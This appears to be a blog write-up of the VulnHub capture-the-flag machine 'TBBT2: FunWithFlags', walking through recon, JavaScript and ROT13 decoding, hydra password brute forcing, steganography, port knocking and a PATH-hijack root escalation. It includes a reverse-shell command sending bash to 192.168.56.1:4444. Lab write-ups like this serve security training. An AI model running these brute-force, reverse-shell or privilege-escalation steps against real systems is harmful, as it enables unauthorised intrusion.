(VulnHub) [ TBBT: 2 — FunWithFlags ] WriteUp — WalkThrough

TBBT2: FunWithFlags______             _    _ _ _   _      ______ _                 
| ___| | | | (_) | | | | ___| |
| |_ _ _ _ __ | | | |_| |_| |__ | |_ | | __ _ __ _ ___
| _| | | | '_ \ | |/\| | | __| '_ \ | _| | |/ _` |/ _` / __|
| | | |_| | | | | \ /\ / | |_| | | | | | | | (_| | (_| \__ \
\_| \__,_|_| |_| \/ \/|_|\__|_| |_| \_| |_|\__,_|\__, |___/
__/ |
|___/
Welcome to "Fun with Flags" 2!This boot2root machine is themed after the famous TV show, The Big Bang Theory and has strong CTF elements.Goal: Hack Sheldon and get user and root flagsDifficulty: Intermediate Runs only with VirtualBox!
DHCP is enabled
Need hints? Tweet @emaragkosYour feedback is really valuable for me!Was there something that you didn’t like about it? Maybe something you have liked more if it was different?Good luck and have fun :)This works best with VirtualBox rather than VMware
> nmap -sC -sV 192.168.56.107
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-21 10:56 GMT Daylight Time
Nmap scan report for 192.168.56.107
Host is up (0.00032s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:1E:75:FE (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.99 seconds
<!--Hint for my future self in case I forget my password /fyhd7fhf84ihdiksowj -->
<html>
<head>
<script language="Javascript" src="5hf7eh39djkf83h2ikfo.js"></script>
</head>
<body>
</body>
</html>
// good luck with deobfuscation
// the easy way or the hard way? which one will you take?
var erp = new Array;
erp[0] = 1008813135;
erp[1] = 1129601360;
erp[2] = 1159751796;
erp[3] = 1835810317;
erp[4] = 171731060;
erp[5] = 1835810317;
erp[6] = 168626748;
erp[7] = 1751474532;
erp[8] = 1041041952;
erp[9] = 540832873;
erp[10] = 1953260862;
erp[11] = 1164797298;
erp[12] = 1734700643;
erp[13] = 2032169573;
erp[14] = 1835626084;
erp[15] = 1701985327;
erp[16] = 1953068140;
erp[17] = 1698565386;
erp[18] = 1009739877;
erp[19] = 1633959437;
erp[20] = 168626748;
erp[21] = 1651467385;
erp[22] = 1041041933;
erp[23] = 171730995;
erp[24] = 1044669793;
erp[25] = 1914726005;
erp[26] = 1953854053;
erp[27] = 542337125;
erp[28] = 1818521454;
erp[29] = 1009739827;
erp[30] = 1041041980;
erp[31] = 1883134319;
erp[32] = 1965058926;
erp[33] = 1870078071;
erp[34] = 1751217184;
erp[35] = 1953439844;
erp[36] = 1865162873;
erp[37] = 1869946989;
erp[38] = 1633969440;
erp[39] = 1952999795;
erp[40] = 557592432;
erp[41] = 1041041980;
erp[42] = 556608854;
erp[43] = 1629515886;
erp[44] = 1718755446;
erp[45] = 1931506530;
erp[46] = 1702130279;
erp[47] = 544893984;
erp[48] = 1668179558;
erp[49] = 1784833393;
erp[50] = 542515317;
erp[51] = 1852404256;
erp[52] = 1734484084;
erp[53] = 1646290786;
erp[54] = 539977589;
erp[55] = 1918854514;
erp[56] = 1853448038;
erp[57] = 1919968626;
erp[58] = 1734308214;
erp[59] = 1696624225;
erp[60] = 1897952098;
erp[61] = 2037998186;
erp[62] = 544306789;
erp[63] = 1919969142;
erp[64] = 1650550317;
erp[65] = 759041290;
erp[66] = 218774575;
erp[67] = 1651467385;
erp[68] = 1041041933;
erp[69] = 171716456;
erp[70] = 1953328190;
erp[71] = 218762506;
erp[72] = 3338;
var em = '';
for(i=0;i<erp.length;i++){
tmp = erp[i];
if(Math.floor((tmp/Math.pow(256,3)))>0){
em += String.fromCharCode(Math.floor((tmp/Math.pow(256,3))));
};
tmp = tmp - (Math.floor((tmp/Math.pow(256,3))) * Math.pow(256,3));
if(Math.floor((tmp/Math.pow(256,2)))>0){
em += String.fromCharCode(Math.floor((tmp/Math.pow(256,2))));
};
tmp = tmp - (Math.floor((tmp/Math.pow(256,2))) * Math.pow(256,2));
if(Math.floor((tmp/Math.pow(256,1)))>0){
em += String.fromCharCode(Math.floor((tmp/Math.pow(256,1))));
};
tmp = tmp - (Math.floor((tmp/Math.pow(256,1))) * Math.pow(256,1));
if(Math.floor((tmp/Math.pow(256,0)))>0){
em += String.fromCharCode(Math.floor((tmp/Math.pow(256,0))));
};
};
document.write(em);
<!DOCTYPE html><html><head>  <title>Emergency reminder</title></head><body><h3>Dear future Sheldon</h3><p>You know what to do, you made this!</p><!--Va pnfr vs sbetrg zl cnffjbeq V unir gb tb gb /gur_erny_frperg_qve naq sbyybj qverpgvbaf-->
</body>
</html>
ROT13 is a simple letter substitution cipher that replaces a letter with the 13th letter after it, in the alphabet.
<!--In case if forget my password I have to go to /the_real_secret_dir and follow directions-->
Folders:
http://192.168.56.107/secret/
Files:
http://192.168.56.107/password.txt
http://192.168.56.107/secret/
<h1>Now read that backwards</h1>
<img src="bazinga.webp" /></br>
Try harder..
http://192.168.56.107/password.txt
Password reminder in case I get a head trauma resulting in amnesia.
I have hidden the first characters. (lowercase letters)
***train
<?php
include_once 'wordlistgenerator.class.php';
for ($i=2;$i<=3;$i++)
{
$ws = new WordlistGenerator($i,'abcdefghijklmnopqrstuvwxyz');
while($ws->isNext()) {
echo $ws->getWord()."train";
file_put_contents("tbbt2_wordlist.txt",$ws->getWord()."train\n",FILE_APPEND);
$ws->nextWord();
echo "\n";
}
unset($ws);
}
?>
php tbbt2_wordlistgen.php
/the_real_secret_dir
> hydra -l sheldon -P tbbt2_wordlist.txt -f 192.168.56.107 http-get /the_real_secret_dir
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-21 14:50:31
[DATA] max 16 tasks per 1 server, overall 16 tasks, 18250 login tries (l:1/p:0), ~18250 tries per task
[DATA] attacking http-get://192.168.56.107:80/the_real_secret_dir
[STATUS] 8682.00 tries/min, 8682 tries in 00:00h, 0 to do in 01:00h, 9568 active
[80][http-get] host: 192.168.56.107 login: sheldon password: oldtrain
[STATUS] attack finished for 192.168.56.107 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-21 14:51:42
Every door comes with a key, here is yours:</br>
Password: /the_real_secret_dir/p4ssw0rd.txt
Now that you have found the key, you also have to find the door</br>
<font color="white">(Hint for my future self: I dont like handshakes, so I dont use them)</font></br>
<img src="alwaysknock3times.gif" alt="Always be polite and knock 3 times"></br>
<img src="secret_message.jpg" alt="Here is your door"></br>
<font color="white">(Hint for my future self: I dont like handshakes, so I dont use them)</font></br>
Soft kitty, warm kitty	    	     	       	    	     	    	     
Little ball of fur

Happy kitty, sleepy kitty
Purr, purr, purr
To extract the message, the command would be
snow -C -p "hello world" outfile
C:\Users\ADMIN\Desktop\snow
> snow -C p4ssw0rd.txt
ilikeklingon
nmap -sU 192.168.56.107 -p 1000,2000,3000
Broadcast message from root@tbbt2 (somewhere) (Tue Apr 21 19:28:01 2020):Antihacker script activated
Broadcast message from root@tbbt2 (somewhere) (Tue Apr 21 19:29:01 2020):Antihacker script activated
Broadcast message from root@tbbt2 (somewhere) (Tue Apr 21 19:30:01 2020):Antihacker script activated
[+] Users with console
root:x:0:0:root:/root:/bin/bash
sheldon:x:1001:1001::/home/sheldon:/bin/rbash
tbbt2:x:1000:1000:tbbt2,,,:/home/tbbt2:/bin/bash
[+] Looking for Knock configuration
Config Knock file found!:
/etc/knockd.conf
Sequence found!:
sequence = 1000:udp,2000:udp,3000:udp
[+] Looking for root files in home dirs (limit 20)
/home
/home/sheldon/Desktop/.iliketrains.c
/home/sheldon/Desktop/iliketrains
/home/sheldon/Desktop/.antihacker.py
[+] Files inside others home (limit 20)
/home/tbbt2/.profile
/home/tbbt2/.ICEauthority
/home/tbbt2/.bash_logout
/home/tbbt2/.vboxclient-seamless.pid
/home/tbbt2/.vboxclient-draganddrop.pid
/home/tbbt2/.vboxclient-display.pid
/home/tbbt2/.xsession-errors
/home/tbbt2/Pictures/Screenshot from 2020-03-25 11-24-21.png
/home/tbbt2/.sudo_as_admin_successful
/home/tbbt2/.bashrc
/home/tbbt2/.Xauthority
/home/tbbt2/.bash_history
[+] Looking for specific hashes inside files - less false positives (limit 70)
/etc/apache2/.htpasswd:$apr1$5ycg2oem$3HQpg64hnAPt6nAaWaGph0
/var/www/tbbt2/the_real_secret_dir/.htpasswd:$apr1$ry6xzq0t$3jOthY4TQOZL38YaCDMYO.
-rwsr-xr-x 1 root root 8392 Απρ   7 01:33 /home/sheldon/Desktop/iliketrains
sheldon@tbbt2:~$ cd Desk-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a2': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a0': invalid number specifier
Broadcast message from root@tbbt2 (somewhere) (Tue Apr 21 20:49:01 2020):Antihacker script activated
-rbash: cd: restricted
sheldon@tbbt2:~$ bash --noprofileBroadcast message from root@tbbt2 (somewhere) (Tue Apr 21 20:51:01 2020):Antihacker script activatedsheldon@tbbt2:~$ cd Desktop
sheldon@tbbt2:~/Desktop$ ls -la
total 32
drwxr-xr-x 2 sheldon sheldon 4096 Απρ 21 20:24 .
drwxr-xr-x 16 sheldon sheldon 4096 Απρ 21 19:25 ..
-rwxr-x--- 1 root root 225 Απρ 7 01:35 .antihacker.py
-rwsr-xr-x 1 root root 8392 Απρ 7 01:33 iliketrains
-rw-r--r-- 1 root root 71 Απρ 7 01:28 .iliketrains.c
#include<unistd.h>
void main()
{
setuid(0);
setgid(0);
system("sl");
}
sheldon@tbbt2:~/Desktop$ which sl
/usr/games/sl
echo "bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'" > sl
echo "/bin/bash" > sl
sheldon@tbbt2:~/Desktop$ export PATH=/home/sheldon/Desktop:$PATH
sheldon@tbbt2:~/Desktop$ ./iliketrains
sh: 1: sl: Permission denied
sheldon@tbbt2:~/Desktop$ chmod +x sl
sheldon@tbbt2:~/Desktop$ ./iliketrains
root@tbbt2:~/Desktop#
root@tbbt2:~/Desktop# id
bash: id: command not found
root@tbbt2:~/Desktop# export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
root@tbbt2:~/Desktop# id
uid=0(root) gid=0(root) groups=0(root),1001(sheldon)
root@tbbt2:~/Desktop# cd /root
root@tbbt2:/root# ls
Desktop Documents Downloads flag.txt Music Pictures Public Templates Videos
root@tbbt2:/root# cat flag.txt
Good job, you pwned me!
The flag is a real amazon gift card.
You could buy an InfoSec book or some toilet paper, its up to you.
If you think you are the first to solve this go claim it, ASAP!
flag{xxxx-xxxxx-xxxx}

--

--

--

I’m AB2 and I’m interested in CTF’s, Web/Server Security, Ethical Hacking, Bug Hunting, Malware Analysis and Penetration Testing.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Huawei Open Testing

Saving S3 Bucket Quotas from Serverless Framework

How to get Classic Widgets back in WordPress 5.8

How to get Classic Widgets back in WordPress 5.8

Unable to Complete Testing in the Sprint

Linux Remote-CLI Flutter App with Python CGI

7 must-have extensions of VS Code

Cloud Architecture for Quantum Computing — with Azure

Leetcode 239. Sliding Window Maximum [Hard]

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
AB2

AB2

I’m AB2 and I’m interested in CTF’s, Web/Server Security, Ethical Hacking, Bug Hunting, Malware Analysis and Penetration Testing.

More from Medium

Pickle Rick — TryHackMe, WriteUp

Tryhackme Easy Peasy Walkthrough

Investigating Windows — TryHackMe writeup

CTFSGCTF 2022 Write-ups